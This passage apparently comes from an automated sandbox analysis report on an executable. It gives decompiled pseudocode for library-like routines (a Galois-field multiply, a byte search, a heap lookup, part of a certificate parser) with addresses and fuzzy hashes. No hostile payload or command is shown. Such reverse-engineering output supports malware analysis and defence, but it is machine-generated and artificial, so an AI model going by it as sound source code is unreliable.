                                            0x0043003a
                                            0x00430012
                                            0x00000000
                                            0x00430012
                                            0x0042ff6d
                                            0x0042ff6d
                                            0x00000000
                                            0x0042ff6d
                                            0x0042fff8
                                            0x0042fff8
                                            0x0042fffb
                                            0x0042ffcd
                                            0x0042ffcd
                                            0x0042ffce
                                            0x0042ffd0
                                            0x0042ffd2
                                            0x00000000
                                            0x0042ffd2
                                            0x0042fffd
                                            0x00430000
                                            0x00000000
                                            0x00000000
                                            0x00430006
                                            0x0042ff75
                                            0x0042ff75
                                            0x00000000
                                            0x0042ff75
                                            0x0042ffa1
                                            0x0042ffe4
                                            0x00000000
                                            0x0042ffe4
                                            0x0042ffa3
                                            0x0042ffa6
                                            0x0042ffd9
                                            0x0042ffdb
                                            0x00000000
                                            0x0042ffdb
                                            0x0042ffa8
                                            0x0042ffab
                                            0x0042ffc9
                                            0x0042ffc9
                                            0x0042ffc9
                                            0x0042ffc9
                                            0x00000000
                                            0x0042ffc9
                                            0x0042ffad
                                            0x0042ffb0
                                            0x0042ffc2
                                            0x00000000
                                            0x0042ffc2
                                            0x0042ffb2
                                            0x0042ffb5
                                            0x00000000
                                            0x00000000
                                            0x0042ffb9
                                            0x00000000
                                            0x0042ffb9
                                            0x0042ff30
                                            0x00000000
                                            0x00000000
                                            0x0042ff36
                                            0x0042ff39
                                            0x0042ff79
                                            0x0042ff79
                                            0x0042ff7c
                                            0x0042ff95
                                            0x00000000
                                            0x0042ff95
                                            0x0042ff7e
                                            0x0042ff7e
                                            0x0042ff81
                                            0x00000000
                                            0x00000000
                                            0x0042ff84
                                            0x0042ff87
                                            0x00000000
                                            0x00000000
                                            0x0042ff89
                                            0x0042ff8c
                                            0x00000000
                                            0x0042ff8c
                                            0x0042ff3b
                                            0x0042ff74
                                            0x00000000
                                            0x0042ff74
                                            0x0042ff40
                                            0x00000000
                                            0x00000000
                                            0x0042ff49
                                            0x00000000
                                            0x00000000
                                            0x0042ff4e
                                            0x00000000
                                            0x00000000
                                            0x0042ff53
                                            0x00000000
                                            0x00000000
                                            0x0042ff5c
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: a0b2d706c1d07cc1ee450f24bcd39255906ece3a547b762f720b071700e03c96
                                            • Instruction ID: 405b0620b93766ab9e58a68d0ae2d0c71c0e1d294c4e15fee0a24a4762814279
                                            • Opcode Fuzzy Hash: a0b2d706c1d07cc1ee450f24bcd39255906ece3a547b762f720b071700e03c96
                                            • Instruction Fuzzy Hash: C351452130061956DB38896866757BF23B59B0F304FD81B3FE952D7382CA1EDD4A835E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041C724, Relevance: 1.4, Strings: 1, Instructions: 111COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E0041C724(signed int* __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int* _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _t81;
				signed int _t83;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t97;
				unsigned int _t101;
				signed int _t105;
				signed int _t106;
				signed int* _t108;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				signed int _t127;
				signed int _t129;

				asm("xorps xmm0, xmm0");
				_t101 = __ecx[1];
				_t124 = __ecx[2];
				asm("movlpd [ebp-0x30], xmm0");
				_v24 = _v48;
				asm("movlpd [ebp-0x38], xmm0");
				_v20 = _v52;
				_v40 = __edx;
				_t110 = __ecx[3];
				_v44 = __ecx;
				_t105 = 0;
				_v16 = _v56;
				_v8 =  *__ecx;
				_v36 = 0;
				_v12 = _v60;
				do {
					_t81 = _v40;
					_v32 = 0x40;
					_t118 =  *(_t81 + _t105 * 8);
					_v28 =  *((intOrPtr*)(_t81 + 4 + _t105 * 8));
					_t83 = _v8;
					_t106 = _v28;
					do {
						_t129 = _t106;
						if(_t129 <= 0 && (_t129 < 0 || _t118 < 0)) {
							_v12 = _v12 ^ _t83;
							_v16 = _v16 ^ _t101;
							_v20 = _v20 ^ _t124;
							_v24 = _v24 ^ _t110;
						}
						_t87 = _v8;
						if((_t124 & 0x00000001) == 0) {
							_t125 = (_t110 << 0x00000020 | _t124) >> 1;
							_t111 = _t110 >> 1;
							if((_t87 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_v28 = _v48;
								_t91 = _v52;
							} else {
								_t91 = 0;
								_v28 = 0x80000000;
							}
							_t110 = _t111 | _v28;
							_t124 = _t125 | _t91;
							_t83 = (_t101 << 0x00000020 | _v8) >> 1;
							_t101 = _t101 >> 1;
						} else {
							_t127 = (_t110 << 0x00000020 | _t124) >> 1;
							_t112 = _t110 >> 1;
							if((_t87 & 0x00000001) == 0) {
								asm("xorps xmm0, xmm0");
								asm("movlpd [ebp-0x30], xmm0");
								_v28 = _v48;
								_t97 = _v52;
							} else {
								_t97 = 0;
								_v28 = 0x80000000;
							}
							_t110 = _t112 | _v28;
							_t124 = _t127 | _t97;
							_t83 = (_t101 << 0x00000020 | _v8) >> 0x1 ^ 0x00000000;
							_t101 = _t101 >> 0x00000001 ^ 0xe1000000;
						}
						_t106 = (_t106 << 0x00000020 | _t118) << 1;
						_v8 = _t83;
						_t118 = _t118 + _t118;
						_t68 =  &_v32;
						 *_t68 = _v32 - 1;
					} while ( *_t68 != 0);
					_t105 = _v36 + 1;
					_v36 = _t105;
				} while (_t105 < 2);
				_t108 = _v44;
				_t93 = _v12;
				_t108[1] = _v16;
				_t108[2] = _v20;
				_t108[3] = _v24;
				 *_t108 = _t93;
				return _t93;
			}



































                                            0x0041c72c
                                            0x0041c730
                                            0x0041c734
                                            0x0041c738
                                            0x0041c740
                                            0x0041c746
                                            0x0041c74b
                                            0x0041c751
                                            0x0041c754
                                            0x0041c757
                                            0x0041c75a
                                            0x0041c75c
                                            0x0041c762
                                            0x0041c765
                                            0x0041c768
                                            0x0041c76b
                                            0x0041c76b
                                            0x0041c76e
                                            0x0041c775
                                            0x0041c77c
                                            0x0041c77f
                                            0x0041c782
                                            0x0041c785
                                            0x0041c785
                                            0x0041c787
                                            0x0041c78f
                                            0x0041c792
                                            0x0041c795
                                            0x0041c798
                                            0x0041c798
                                            0x0041c7a3
                                            0x0041c7a6
                                            0x0041c7eb
                                            0x0041c7f2
                                            0x0041c7f7
                                            0x0041c804
                                            0x0041c807
                                            0x0041c80f
                                            0x0041c812
                                            0x0041c7f9
                                            0x0041c7f9
                                            0x0041c7fb
                                            0x0041c7fb
                                            0x0041c815
                                            0x0041c818
                                            0x0041c81d
                                            0x0041c821
                                            0x0041c7a8
                                            0x0041c7a8
                                            0x0041c7af
                                            0x0041c7b4
                                            0x0041c7c1
                                            0x0041c7c4
                                            0x0041c7cc
                                            0x0041c7cf
                                            0x0041c7b6
                                            0x0041c7b6
                                            0x0041c7b8
                                            0x0041c7b8
                                            0x0041c7d2
                                            0x0041c7d5
                                            0x0041c7e0
                                            0x0041c7e3
                                            0x0041c7e3
                                            0x0041c823
                                            0x0041c827
                                            0x0041c82a
                                            0x0041c82c
                                            0x0041c82c
                                            0x0041c82c
                                            0x0041c839
                                            0x0041c83a
                                            0x0041c83d
                                            0x0041c846
                                            0x0041c84c
                                            0x0041c84f
                                            0x0041c855
                                            0x0041c85b
                                            0x0041c860
                                            0x0041c866

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                            • Instruction ID: b815810bc2923f7229bb7383272e61a8e9666e203e964672091187bb732ee431
                                            • Opcode Fuzzy Hash: afc649a906c918a612c1bf2ed60efbe29a77397457307a03108316727d093398
                                            • Instruction Fuzzy Hash: 8B41F676D506199BCB04CFA9C9816EEFBF1FF88310F25815AE915B3340D3B5A9828F94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042AE10, Relevance: 1.3, Strings: 1, Instructions: 76COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0042AE10(signed int _a4, signed char _a8, intOrPtr _a12) {
				intOrPtr _t13;
				void* _t14;
				signed char _t20;
				signed char _t24;
				signed int _t27;
				signed char _t32;
				unsigned int _t33;
				signed char _t35;
				signed char _t37;
				signed int _t39;

				_t13 = _a12;
				if(_t13 == 0) {
					L11:
					return _t13;
				} else {
					_t39 = _a4;
					_t20 = _a8;
					if((_t39 & 0x00000003) == 0) {
						L5:
						_t14 = _t13 - 4;
						if(_t14 < 0) {
							L8:
							_t13 = _t14 + 4;
							if(_t13 == 0) {
								goto L11;
							} else {
								while(1) {
									_t24 =  *_t39;
									_t39 = _t39 + 1;
									if((_t24 ^ _t20) == 0) {
										goto L20;
									}
									_t13 = _t13 - 1;
									if(_t13 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L24;
								}
								goto L20;
							}
						} else {
							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
							do {
								_t27 =  *_t39 ^ _t20;
								_t39 = _t39 + 4;
								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
									goto L12;
								} else {
									_t32 =  *(_t39 - 4) ^ _t20;
									if(_t32 == 0) {
										return _t39 - 4;
									} else {
										_t33 = _t32 ^ _t20;
										if(_t33 == 0) {
											return _t39 - 3;
										} else {
											_t35 = _t33 >> 0x00000010 ^ _t20;
											if(_t35 == 0) {
												return _t39 - 2;
											} else {
												if((_t35 ^ _t20) == 0) {
													goto L20;
												} else {
													goto L12;
												}
											}
										}
									}
								}
								goto L24;
								L12:
								_t14 = _t14 - 4;
							} while (_t14 >= 0);
							goto L8;
						}
					} else {
						while(1) {
							_t37 =  *_t39;
							_t39 = _t39 + 1;
							if((_t37 ^ _t20) == 0) {
								break;
							}
							_t13 = _t13 - 1;
							if(_t13 == 0) {
								goto L11;
							} else {
								if((_t39 & 0x00000003) != 0) {
									continue;
								} else {
									goto L5;
								}
							}
							goto L24;
						}
						L20:
						return _t39 - 1;
					}
				}
				L24:
			}













                                            0x0042ae10
                                            0x0042ae17
                                            0x0042ae6c
                                            0x0042ae6c
                                            0x0042ae19
                                            0x0042ae19
                                            0x0042ae1f
                                            0x0042ae29
                                            0x0042ae41
                                            0x0042ae41
                                            0x0042ae44
                                            0x0042ae58
                                            0x0042ae58
                                            0x0042ae5b
                                            0x00000000
                                            0x0042ae5d
                                            0x0042ae5d
                                            0x0042ae5d
                                            0x0042ae5f
                                            0x0042ae64
                                            0x00000000
                                            0x00000000
                                            0x0042ae66
                                            0x0042ae69
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042ae69
                                            0x00000000
                                            0x0042ae5d
                                            0x0042ae46
                                            0x0042ae53
                                            0x0042ae72
                                            0x0042ae74
                                            0x0042ae82
                                            0x0042ae8b
                                            0x00000000
                                            0x0042ae8d
                                            0x0042ae90
                                            0x0042ae92
                                            0x0042aebc
                                            0x0042ae94
                                            0x0042ae94
                                            0x0042ae96
                                            0x0042aeb6
                                            0x0042ae98
                                            0x0042ae9b
                                            0x0042ae9d
                                            0x0042aeb0
                                            0x0042ae9f
                                            0x0042aea1
                                            0x00000000
                                            0x0042aea3
                                            0x00000000
                                            0x0042aea3
                                            0x0042aea1
                                            0x0042ae9d
                                            0x0042ae96
                                            0x0042ae92
                                            0x00000000
                                            0x0042ae6d
                                            0x0042ae6d
                                            0x0042ae6d
                                            0x00000000
                                            0x0042ae57
                                            0x0042ae2b
                                            0x0042ae2b
                                            0x0042ae2b
                                            0x0042ae2d
                                            0x0042ae32
                                            0x00000000
                                            0x00000000
                                            0x0042ae34
                                            0x0042ae37
                                            0x00000000
                                            0x0042ae39
                                            0x0042ae3f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042ae3f
                                            0x00000000
                                            0x0042ae37
                                            0x0042aea6
                                            0x0042aeaa
                                            0x0042aeaa
                                            0x0042ae29
                                            0x00000000

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: @0@
                                            • API String ID: 0-641803185
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: 95f0b4ac720d3e95b615ace1d56fad26078ad3dc8f1ed7cd968e0a2bbc49bafb
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: B9117B773C016183D614862DF8B87B7B395EBC6320BAF4767C9424B714C22A9827960A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043D5BD, Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043D5BD() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x46096c = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                            0x0043d5bd
                                            0x0043d5c5
                                            0x0043d5cd

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: HeapProcess
                                            • String ID:
                                            • API String ID: 54951025-0
                                            • Opcode ID: d5bb4926f433203fc5622264f7c2e4e60d758da076022f2bbf221d7a24ad2977
                                            • Instruction ID: 6a9110da8699678ca72308ed4b5e5969146dfaf94c9c34e83bbc48f01628af7c
                                            • Opcode Fuzzy Hash: d5bb4926f433203fc5622264f7c2e4e60d758da076022f2bbf221d7a24ad2977
                                            • Instruction Fuzzy Hash: 1EA012B42011018B7B004F32590820A359565062803008074E000D0120E63044009F05
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00447B40, Relevance: .7, Instructions: 651COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0ebe0d396521952196815a43e8edbcac889f372f1e6e8746c28d08bbf19798f
                                            • Instruction ID: 463732d3fd7a597e5ea0b1c7bc94ea5a8a4b5659638b7b6007c7b700dc91aea8
                                            • Opcode Fuzzy Hash: c0ebe0d396521952196815a43e8edbcac889f372f1e6e8746c28d08bbf19798f
                                            • Instruction Fuzzy Hash: 0A320721D25F414DE763A638C82233AA28DAFB33C5F55D737E816B5AA6EF29C4C34144
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00441A39, Relevance: .6, Instructions: 637COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d0d5f3496db18cf6f8f15b771cc3e0bfc87c867a75e769ef86365c98f19500e
                                            • Instruction ID: 714f475c7954e256a1c64056a4bc8d0d40163a0f211e159743ac9ce8b42102d7
                                            • Opcode Fuzzy Hash: 3d0d5f3496db18cf6f8f15b771cc3e0bfc87c867a75e769ef86365c98f19500e
                                            • Instruction Fuzzy Hash: D3324821D29F014DE7239634D922336A288AFB73C5F55D737F81AB5AAAEB6DC4C34104
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041426F, Relevance: .6, Instructions: 585COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0041426F(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				signed char _v7;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v34;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				intOrPtr _v68;
				void _v72;
				void* __edi;
				void* _t251;
				void _t254;
				signed char _t272;
				void* _t274;
				intOrPtr _t275;
				intOrPtr* _t280;
				void* _t281;
				void* _t285;
				intOrPtr _t292;
				void* _t318;
				signed short _t321;
				intOrPtr _t326;
				void* _t338;
				void* _t350;
				void* _t362;
				signed char _t370;
				signed int _t371;
				intOrPtr _t374;
				intOrPtr* _t375;
				signed int _t377;
				intOrPtr _t379;
				signed int _t384;
				signed int _t385;
				signed int _t389;
				signed int _t395;
				signed int _t436;
				signed int _t438;
				signed char _t442;
				intOrPtr _t445;
				signed int _t447;
				void* _t448;
				signed char _t449;
				void* _t454;
				intOrPtr _t475;
				intOrPtr _t480;
				intOrPtr _t481;
				intOrPtr* _t482;
				intOrPtr _t483;
				intOrPtr _t484;
				intOrPtr _t485;
				signed int _t486;
				intOrPtr _t488;
				signed int _t489;
				void* _t490;
				void* _t491;
				void* _t492;
				void* _t493;
				void* _t497;

				_t375 = __ecx;
				_v12 = __edx;
				_t377 = 0xa;
				_t442 =  *(__ecx + 0x308) & 0x0000ffff;
				_t486 = 0;
				_t251 = memset( &_v72, 0, _t377 << 2);
				_t491 = _t490 + 0xc;
				 *(_t375 + 0x318) = _t251;
				_v28 = _t251;
				_v24 = _t251;
				_t480 =  *_a4;
				_v60 = _t480;
				_t379 = _t480;
				_v56 = _t379;
				if(_t442 < 0x8000) {
					L9:
					_push(0x48);
					_t254 = E00427471();
					_v72 = _t254;
					if(_t254 == 0) {
						L8:
						_t486 = 0xffffff83;
						L120:
						E0041410C( &_v72);
						E00413541(_t375);
						return _t486;
					}
					E0042B710(_t480, _t254, 0, 0x48);
					_t492 = _t491 + 0xc;
					if(_t480 - _v56 + 3 > _a8) {
						L2:
						_t486 = 0xfffffeb8;
						goto L120;
					}
					E0041282B(_t480 + _v12,  &_v20);
					_t384 = _v20;
					_t481 = _t480 + 3;
					_v60 = _t481;
					_v16 = _t384;
					if(_t384 > 0x481e) {
						goto L2;
					}
					_t445 = _v56;
					if(_t384 - _t445 + _t481 != _a8) {
						goto L2;
					}
					_t385 = _v52;
					if(_t384 == 0) {
						L24:
						_v44 = _v44 & 0x00000000;
						_v48 = _t385;
						if(_t385 != 0) {
							L30:
							_v34 = _v34 & 0x0000fffb;
							_t482 = E00427471();
							_v64 = _t482;
							if(_t482 == 0) {
								goto L8;
							}
							E0042B710(_t482, _t482, 0, 0x370);
							_t387 = _v52;
							_t447 = 1;
							_t493 = _t492 + 0xc;
							 *(_t375 + 0x318) = 1;
							if(_t387 <= 0 || _t387 <= 1) {
								L50:
								if(_t486 != 0) {
									goto L120;
								}
								 *(_t375 + 0x318) = 2;
								if(_v48 <= _t486) {
									_t448 = 0;
									L64:
									_t449 = _t448 + 1;
									L65:
									_t389 = _v34 & _t449;
									_v24 = _t389;
									if(_t389 == 0 || _t486 == 0) {
										 *(_t375 + 0x318) = 3;
										if(_v48 <= 0) {
											L103:
											if(_v24 == 0 || _t486 == 0) {
												 *(_t375 + 0x318) = 4;
												if(_v40 != 0) {
													_t486 =  ==  ? _v40 : _t486;
												}
												_t486 = E00413FBD( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t486,  &_v72);
												_t272 =  *(_t375 + 0x308) & 0x0000ffff;
												_t395 = _t272 & 0x00000080;
												if(_t395 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
													 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
													_t486 = 0;
												}
												if(_t486 == 0) {
													if((_t272 & 0x00000030) == 0x10) {
														 *((char*)(_t375 + 0x311)) = 5;
													}
												} else {
													if(_t395 == 0) {
														E00413F5E(_t375, _t486);
													}
													 *(_t375 + 0x1f0) = _t486;
												}
												_t274 = E004128A7(_t375);
												_t275 = _v60;
												if(_t274 != 0) {
													_t275 = _t275 +  *((intOrPtr*)(_t375 + 0x300));
													_v60 = _t275;
												}
												 *(_t375 + 0x318) = 5;
												 *_a4 = _t275;
											}
											goto L120;
										}
										if( *(_t482 + 0x36c) >= 0x80) {
											if( *((intOrPtr*)(_t375 + 0x227)) == _t449 && ( *(_t375 + 0x308) & 0x00000030) == 0x10) {
												_t486 =  ==  ? 0xfffffe7f : _t486;
											}
											_t292 =  *((intOrPtr*)(_t375 + 0x228));
											if(_t292 == _t449 || _t292 == 3 &&  *((char*)(_t375 + 0x22b)) == 0) {
												_t486 =  ==  ? 0xfffffe81 : _t486;
											}
										}
										if(( *(_t482 + 0x36d) & _t449) != 0) {
											if(( *(_t375 + 0x308) & 0x00000030) != 0x10) {
												_t486 =  ==  ? 0xfffffe7e : _t486;
											} else {
												if(( *(_t482 + 0x31c) & 0x00000003) == 0) {
													_t486 = 0xfffffe7e;
												}
											}
										}
										if(_t389 == 0) {
											 *(_t375 + 0x30a) =  *(_t375 + 0x30a) | 0x00002000;
											if(( *(_t375 + 0x308) & 0x00000080) == 0) {
												_t286 =  *((intOrPtr*)(_t375 + 0xf8));
												if( *((intOrPtr*)(_t375 + 0xf8)) != 0) {
													if( *((intOrPtr*)(_t482 + 0x24)) == 0) {
														E00413E5C( *((intOrPtr*)(_t482 + 0x7c)), _t286);
														_t486 =  ==  ? 0xfffffebe : _t486;
													} else {
														_push(_t389);
														if(E00413F04(_t286) != 1) {
															_t486 = 0xfffffebe;
														}
													}
												}
											}
											if( *((intOrPtr*)(_t482 + 0x1c)) != 0x206) {
												goto L103;
											} else {
												_v28 = _v28 & 0x00000000;
												_t280 = _t375 + 0x37c;
												_t399 =  *_t280;
												if( *_t280 != 0) {
													if( *((char*)(_t375 + 0x382)) == 0) {
														L96:
														_t281 = E004201FA( *_t482,  &_v28,  *_t280,  *((intOrPtr*)(_t482 + 4)));
														if(_t281 != 0) {
															L98:
															_t486 = 0xfffffeaa;
															L99:
															if(_t486 == 0 &&  *((char*)(_t375 + 0x382)) != 0 && ( *(_t375 + 0x308) & 0x00000080) == 0) {
																E00423783( *((intOrPtr*)(_t375 + 0x37c)));
																_t486 =  <  ? 0xfffffe66 : _t486;
															}
															goto L103;
														}
														 *((char*)(_t375 + 0x382)) = _t281 + 1;
														goto L99;
													}
													_t285 = E00413520(_t375, _t399);
													 *((char*)(_t375 + 0x382)) = 0;
													L94:
													if(_t285 != 0) {
														goto L98;
													}
													_t280 = _t375 + 0x37c;
													goto L96;
												}
												_push(_t280);
												_t454 = 0x25;
												_t285 = E0041348F(_t454);
												goto L94;
											}
										} else {
											 *(_t375 + 0x1f0) = _t486;
											goto L120;
										}
									} else {
										goto L120;
									}
								}
								_v44 = _v44 & _t486;
								_t486 = E0041415A(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
								if(_t486 != 0) {
									if(_t486 == 0xffffff74 || _t486 == 0xffffff7c) {
										_t482 = _v64;
										_t449 = 1;
										_v34 = _v34 | 1;
									} else {
										_t482 = _v64;
										_t449 = 1;
										if( *((intOrPtr*)(_t375 + 0x80)) == 0) {
											_v34 = _v34 | 1;
										} else {
											_v34 = _v34 ^ (_v34 >> 0x00000001 ^ _v34) & 1;
										}
									}
									goto L65;
								}
								_t482 = _v64;
								_t448 = 0;
								if((_v34 & 0x00000002) == 0) {
									_v34 = _v34 & 0x0000fffe;
									goto L64;
								} else {
									_t486 = _v40;
									_t449 = 1;
									_v34 = _v34 | 1;
									goto L65;
								}
							} else {
								do {
									_v44 = _v48 - 1;
									_t318 = E0041415A(_t375,  &_v72, _t387,  !(( *(_t375 + 0x308) & 0x0000ffff) >> 7) & _t447,  &_v28,  &_v24);
									_t493 = _t493 + 0x10;
									if(_t318 == 0) {
										_t318 = E00414237(_t375,  &_v72);
									}
									_t486 = E00413FBD( *((intOrPtr*)( *_t375 + 0x50)), _t375, _t318,  &_v72);
									_t321 =  *(_t375 + 0x308) & 0x00000080;
									if(_t321 != 0 && (_t486 == 0xfffffe96 || _t486 == 0xfffffe97)) {
										 *(_t375 + 0x1f0) =  *(_t375 + 0x1f0) & 0x00000000;
										_t486 = 0;
									}
									_t482 = _v64;
									if(_t486 != 0) {
										L45:
										if(( *(_t375 + 0x308) & 0x00000080) == 0) {
											E00413F5E(_t375, _t486);
										}
										 *(_t375 + 0x1f0) = _t486;
										if(_v40 == 0) {
											_v40 = _t486;
											_t486 = 0;
										}
										goto L49;
									}
									if(( *(_t482 + 0x36c) & 0x00000010) != 0 && _t321 == 0 && _v24 == 0) {
										_v20 = _v20 & 0x00000000;
										_t486 = E0041FE6F( &_v20,  *((intOrPtr*)(_v72 + 4 + _v44 * 8)), 5,  *((intOrPtr*)(_t375 + 0x84)));
										if(_t486 < 0) {
											goto L120;
										}
										E0042BC80( *_v20,  *((intOrPtr*)(_v72 + _v44 * 8)),  *((intOrPtr*)(_v72 + 4 + _v44 * 8)));
										_t493 = _t493 + 0xc;
										_t486 =  ==  ? 0 : E00416312( *((intOrPtr*)( *_t375 + 0x50)),  &_v20, 2, 0);
										if(_t486 == 0) {
											goto L49;
										}
										goto L45;
									}
									L49:
									_t387 = _t482;
									E0041DA2A(_t482);
									_v34 = _v34 & 0x0000fffb;
									_t447 = 1;
									_t326 = _v48 - 1;
									_v48 = _t326;
								} while (_t326 > 1);
								goto L50;
							}
						}
						if(( *(_t375 + 0x30c) & 0x00002000) != 0) {
							L28:
							if(( *(_t375 + 0x308) & 0x00000030) == 0) {
								_t486 = 0xfffffea7;
								E00413F5E(_t375, 0xfffffea7);
							}
							goto L30;
						}
						if(( *(_t375 + 0x308) & 0x00000100) == 0) {
							goto L30;
						}
						_t338 = E0041288B( *(_t375 + 0x218) & 0x0000ffff);
						_t492 = _t492 + 4;
						if(_t338 == 0) {
							goto L30;
						}
						goto L28;
					}
					L14:
					L14:
					if(_t385 >= ( *(_t375 + 0x20e) & 0x000000ff) || _t385 >= 9) {
						_t486 = 0xfffffe90;
					} else {
						goto L16;
					}
					goto L120;
					L16:
					if(_t481 - _t445 + 3 > _a8) {
						goto L2;
					}
					E0041282B(_t481 + _v12,  &_v20);
					_t483 = _t481 + 3;
					_v60 = _t483;
					if(_v20 - _v56 + _t483 > _a8) {
						goto L2;
					}
					_t436 = _v52;
					 *((intOrPtr*)(_v72 + 4 + _t436 * 8)) = _v20;
					_t481 = _t483 + _v20;
					_v60 = _t481;
					 *((intOrPtr*)(_v72 + _t436 * 8)) = _v12 + _t483;
					_t445 = _v56;
					_t350 = 0xfffffffd;
					_v16 = _v16 + _t350 - _v20;
					if( *(_t375 + 0x308) < 0x8000) {
						L23:
						_t385 = _t436 + 1;
						_v52 = _t385;
						if(_v16 != 0) {
							goto L14;
						}
						goto L24;
					}
					if(_t481 - _t445 + 2 > _a8) {
						goto L2;
					}
					_t488 = _v12;
					E00412845(_t481 + _t488,  &_v8);
					_t484 = _t481 + 2;
